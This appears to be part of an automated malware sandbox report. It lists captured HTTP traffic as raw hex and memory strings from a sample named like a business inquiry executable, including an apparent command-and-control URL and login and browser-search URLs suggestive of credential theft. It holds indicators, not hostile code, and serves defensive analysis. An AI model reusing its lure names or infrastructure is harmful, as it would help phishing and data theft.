39 5e 34 70 76 a6 61 a4 68 78 58 ab f2 bf 60 ba bb 8a 96 33 c0 0c 96 95 00 f0 3f 96 9c 41 98 78 e0 85 81 8d ee f2 50 be 46 4c 1a e2 7d ac 54 3f d6 f9 af de 49 d7 e0 6f 2f 3b 8b 68 df d0 53 a3 5e 69 d4 43 fe 6b ed 7f 5c d3 93 99 a6 f5 94 6a b4 dd 7d d2 e9 8f c3 a7 06 61 d3 48 f8 af f3 be bd 0e 1f 99 80 9b 68 d0 f3 e3 49 3c ef 25 fe 38 98 06 3d 4a ee 6e e9 0f c4 a3 1a 54 aa 01 64 70 d0 fe 14 ce b6 c7 63 10 24 1f d2 78 66 f0 d9 8e 7a 19 17 fd a1 23 68 7a 95 a6 d7 e0 bf b4 f6 e1 de 11 78 83 01 84 c6 75 a0 49 fa 87 d3 b2 fe b1 52 ff 88 15 f9 f1 7d 7c 0b bb 60 55 14 64 73 8a 85 15 8f e6 de 6c 7c 6b 28 f8 c7 71 56 b5 56 a9 d6 c6 fc f7 a9 36 dd 16 8b 3f 60 3e b1 72 c2 59 fa 78 67 67 b7 fb f8 6e 12 a4 4e d0 fd be f6 08 32 3c 49 9d b4 2b 6f c3 e1 ce f7 c1 0f 3f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 26 Apr 2024 05:44:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=983qcbk7i5o6majh8bh673shg4; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Encoding: gzipData Raw: 33 37 39 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db 38 92 ee e7 e9 73 e6 3f b0 b5 3b 3d f6 6d 8b 7a b5 64 39 56 7a dd 8e d3 f1 dd 38 f1 c4 4e f7 ce 24 59 1d 8a a2 24 26 12 a9 88 94 1d c7 9d 1f 76 3f df 3f 76 9f a7 00 90 a0 5e 6c 25 d3 7b 76 3f dc 3e 1d 99 22 80 42 a1 50 a8 2a 14 aa a0 a3 ef 9f bc 3c b9 fa fb c5 a9 33 4e a7 93 c7 df 1d f1 8f e3 4f bc 24 e9 96 a2 b8 fc 3e 29 39 b3 79 30 0c 3f 75 4b f1 e8 10 b5 d2 59 72 58 a9 c4 a3 99 3b 0d 2a 51 f2 2f 25 67 e2 45 a3 6e 29 4c 4b 6c 1e 78 83 c7 47 93 30 fa e0 cc 83 49 b7 84 b6 7e 1c 45 81 9f 96 9c 31 e0 74 4b 06 c2 a0 36 08 eb 93 cf 8b 71 a7 3d 1c d7 5d 7f 12 2f 06 c3 79 1c a5 6e 14 a0 b2 3f 8f 93 24 9e 87 a3 30 da 0e de 10 4d 13 77 94 a4 5e 1a fa ae 1f 4f 97 60 4c 83 d4 73 fc b1 37 4f 82 b4 5b 5a a4 c3 f2 41 c9 86 1c 02 cf af c2 b1 32 0c 27 41 52 a9 0f f0 7f c8 7f d7 8d b1 9b 5c 8f 7e 9a 8d bb 7e bf e1 b5 0f 82 ce 7e bb e4 a4 b7 b3 00 e4 99 7a a3 a0 82 e2 1f 3f 4d 27 25 27 09 3f 07 a0 b0 17 dd fe 21 48 54 db 95 6a 7b c8 7f 9f 3f 1e 7c 2d 12 b5 d6 a7 5a eb 0f 41 a3 f6 be 52 7b df e0 bf 76 ab ed 82 a2 4b b4 b0 e9 ed cd 66 93 a0 9c c6 0b 7f 5c fe 56 da 7f 4d 7f ff 65 7d 7c e7 e0 bf 23 61 2f f2 76 39 f8 b8 08 af bb a5 ff 28 bf 3e 2e 9f c4 d3 19 f8 b1 3f 09 c0 8d 60 d0 20 02 ef 9d 9d 76 83 c1 28 c0 72 91 96 69 98 4e 82 c7 cd 6a d3 29 3b 17 1e f8 dd 73 a2 38 72 d2 79 7c ed 81 65 0f 0f 9d a9 97 ce c3 69 1c 85 78 33 01 08 54 09 d2 78 3a f5 92 f8 a8 a2 9a 5b 48 44 de 14 fc 76 1d 06 37 b3 78 ce 95 64 fa bd 09 07 e9 b8 3b 08 ae 43 3f 28 cb 97 bd 30 0a d3 d0 9b 94 13 1f 80 bb 35 83 92 0c 46 c1 99 26 9c a8 d0 c7 28 e2 a8 9c 7a b3 f2 38 1c 8d 27 f8 67 83 8e 62 d3 54 96 fe 57 ac 74 bd 8a aa cd 4a b5 39 e3 bf f0 60 df f5 93 64 89 73 9c 69 30 08 3d ca 93 30 42 c7 22 5b 92 f4 16 0b 70 1c 40 5c 68 52 7e 63 e7 f5 f7 95 fa fb 5b fe db 1f 75 ee e9 3c f1 e7 41 10 39 5e 34 70 76 a6 61 a4 68 78 58 ab f2 bf 60 ba bb 8a 96 33 c0 0c 96 95 00 f0 3f 96 9c 41 98 78 e0 85 81 8d ee f2 50 be 46 4c 1a e2 7d ac 54 3f d6 f9 af de 49 d7 e0 6f 2f 3b 8b 68 df d0 53 a3 5e 69 d4 43 fe 6b ed 7f 5c d3 93 99 a6 f5 94 6a b4 dd 7d d2 e9 8f c3 a7 06 61 d3 48 f8 af f3 be bd 0e 1f 99 80 9b 68 d0 f3 e3 49 3c ef 25 fe 38 98 06 3d 4a ee 6e e9 0f c4 a3 1a 54 aa 01 64 70 d0 fe 14 ce b6 c7 63 10 24 1f d2 78 66 f0 d9 8e 7a 19 17 fd a1 23 68 7a 95 a6 d7 e0 bf b4 f6 e1 de 11 78 83 01 84 c6 75 a0 49 fa 87 d3 b2 fe b1 52 ff 88 15 f9 f1 7d 7c 0b bb 60 55 14 64 73 8a 85 15 8f e6 de 6c 7c 6b 28 f8 c7 71 56 b5 56 a9 d6 c6 fc f7 a9 36 dd 16 8b 3f 60 3e b1 72 c2 59 fa 78 67 67 b7 fb f8 6e 12 a4 4e d0 fd be f6 08 32 3c 49 9d b4 2b 6f c3 e1 ce f7 c1 0f 3f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 26 Apr 2024 05:44:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=hb1459pqtrms7uuji7ounmqv7l; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Encoding: gzipData Raw: 33 37 39 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 6d 77 db 38 92 ee e7 e9 73 e6 3f b0 b5 3b 3d f6 6d 8b 7a b5 64 39 56 7a dd 8e d3 f1 dd 38 f1 c4 4e f7 ce 24 59 1d 8a a2 24 26 12 a9 88 94 1d c7 9d 1f 76 3f df 3f 76 9f a7 00 90 a0 5e 6c 25 d3 7b 76 3f dc 3e 1d 99 22 80 42 a1 50 a8 2a 14 aa a0 a3 ef 9f bc 3c b9 fa fb c5 a9 33 4e a7 93 c7 df 1d f1 8f e3 4f bc 24 e9 96 a2 b8 fc 3e 29 39 b3 79 30 0c 3f 75 4b f1 e8 10 b5 d2 59 72 58 a9 c4 a3 99 3b 0d 2a 51 f2 2f 25 67 e2 45 a3 6e 29 4c 4b 6c 1e 78 83 c7 47 93 30 fa e0 cc 83 49 b7 84 b6 7e 1c 45 81 9f 96 9c 31 e0 74 4b 06 c2 a0 36 08 eb 93 cf 8b 71 a7 3d 1c d7 5d 7f 12 2f 06 c3 79 1c a5 6e 14 a0 b2 3f 8f 93 24 9e 87 a3 30 da 0e de 10 4d 13 77 94 a4 5e 1a fa ae 1f 4f 97 60 4c 83 d4 73 fc b1 37 4f 82 b4 5b 5a a4 c3 f2 41 c9 86 1c 02 cf af c2 b1 32 0c 27 41 52 a9 0f f0 7f c8 7f d7 8d b1 9b 5c 8f 7e 9a 8d bb 7e bf e1 b5 0f 82 ce 7e bb e4 a4 b7 b3 00 e4 99 7a a3 a0 82 e2 1f 3f 4d 27 25 27 09 3f 07 a0 b0 17 dd fe 21 48 54 db 95 6a 7b c8 7f 9f 3f 1e 7c 2d 12 b5 d6 a7 5a eb 0f 41 a3 f6 be 52 7b df e0 bf 76 ab ed 82 a2 4b b4 b0 e9 ed cd 66 93 a0 9c c6 0b 7f 5c fe 56 da 7f 4d 7f ff 65 7d 7c e7 e0 bf 23 61 2f f2 76 39 f8 b8 08 af bb a5 ff 28 bf 3e 2e 9f c4 d3 19 f8 b1 3f 09 c0 8d 60 d0 20 02 ef 9d 9d 76 83 c1 28 c0 72 91 96 69 98 4e 82 c7 cd 6a d3 29 3b 17 1e f8 dd 73 a2 38 72 d2 79 7c ed 81 65 0f 0f 9d a9 97 ce c3 69 1c 85 78 33 01 08 54 09 d2 78 3a f5 92 f8 a8 a2 9a 5b 48 44 de 14 fc 76 1d 06 37 b3 78 ce 95 64 fa bd 09 07 e9 b8 3b 08 ae 43 3f 28 cb 97 bd 30 0a d3 d0 9b 94 13 1f 80 bb 35 83 92 0c 46 c1 99 26 9c a8 d0 c7 28 e2 a8 9c 7a b3 f2 38 1c 8d 27 f8 67 83 8e 62 d3 54 96 fe 57 ac 74 bd 8a aa cd 4a b5 39 e3 bf f0 60 df f5 93 64 89 73 9c 69 30 08 3d ca 93 30 42 c7 22 5b 92 f4 16 0b 70 1c 40 5c 68 52 7e 63 e7 f5 f7 95 fa fb 5b fe db 1f 75 ee e9 3c f1 e7 41 10 39 5e 34 70 76 a6 61 a4 68 78 58 ab f2 bf 60 ba bb 8a 96 33 c0 0c 96 95 00 f0 3f 96 9c 41 98 78 e0 85 81 8d ee f2 50 be 46 4c 1a e2 7d ac 54 3f d6 f9 af de 49 d7 e0 6f 2f 3b 8b 68 df d0 53 a3 5e 69 d4 43 fe 6b ed 7f 5c d3 93 99 a6 f5 94 6a b4 dd 7d d2 e9 8f c3 a7 06 61 d3 48 f8 af f3 be bd 0e 1f 99 80 9b 68 d0 f3 e3 49 3c ef 25 fe 38 98 06 3d 4a ee 6e e9 0f c4 a3 1a 54 aa 01 64 70 d0 fe 14 ce b6 c7 63 10 24 1f d2 78 66 f0 d9 8e 7a 19 17 fd a1 23 68 7a 95 a6 d7 e0 bf b4 f6 e1 de 11 78 83 01 84 c6 75 a0 49 fa 87 d3 b2 fe b1 52 ff 88 15 f9 f1 7d 7c 0b bb 60 55 14 64 73 8a 85 15 8f e6 de 6c 7c 6b 28 f8 c7 71 56 b5 56 a9 d6 c6 fc f7 a9 36 dd 16 8b 3f 60 3e b1 72 c2 59 fa 78 67 67 b7 fb f8 6e 12 a4 4e d0 fd be f6 08 32 3c 49 9d b4 2b 6f c3 e1 ce f7 c1 0f 3f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Fri, 26 Apr 2024 05:44:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=40eds17c4uuojiiesh5igmgt9g; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheData Raw: 61 31 33 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 6c 61 6e 67 3d 22 69 74 22 3e 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 32 64 2f 32 64 69 2f 32 64 69 76 33 68 2e 73 76 67 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 61 6e 79 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 30 37 2f 30 37 66 2f 30 37 66 7a 71 38 2e 73 76 67 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: replace.exe, 00000015.00000002.3685026177.0000000004B46000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000046C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://fedoraproject.org/
                Source: replace.exe, 00000015.00000002.3685026177.0000000004B46000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000046C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                Source: yTVsQcNOAKqLIKj.exe, 00000016.00000002.3686434671.000000000595C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.solesense.pro
                Source: yTVsQcNOAKqLIKj.exe, 00000016.00000002.3686434671.000000000595C000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.solesense.pro/aleu/
                Source: replace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: replace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://api2.wanjd.cn/h5_share/ads/zs
                Source: replace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://arsys.es/css/parking2.css
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/default.css
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/footer.html
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/header.html
                Source: firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/images/icon.png
                Source: firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/images/thumbnail.png
                Source: replace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: replace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: replace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.js
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e957
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/04/04p/04pi85.css?ph=cb3a78e957
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/0e/0e7/0e7xip.css?ph=cb3a78e957
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/0q/0q2/0q229t.css?ph=cb3a78e957
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/13/13s/13s9j7.css?ph=cb3a78e957
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/1e/1em/1empxr.js?ph=cb3a78e957
                Source: yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e957
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/2j/2jh/2jh1ov.css?ph=cb3a78e957
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/2j/2jy/2jy5g9.css?ph=cb3a78e957
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/2q/2qj/2qjoy2.css?ph=cb3a78e957
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=cb3a78e957
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/4a/4a3/4a3t1k.css?ph=cb3a78e957
                Source: replace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: replace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: replace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://events.webnode.com/projects/-/events/
                Source: replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
                Source: replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://klientams.iv.lt/
                Source: replace.exe, 00000015.00000002.3680182899.0000000002DC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: replace.exe, 00000015.00000002.3680182899.0000000002DC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: replace.exe, 00000015.00000002.3680182899.0000000002DC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: replace.exe, 00000015.00000002.3680182899.0000000002DC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10331
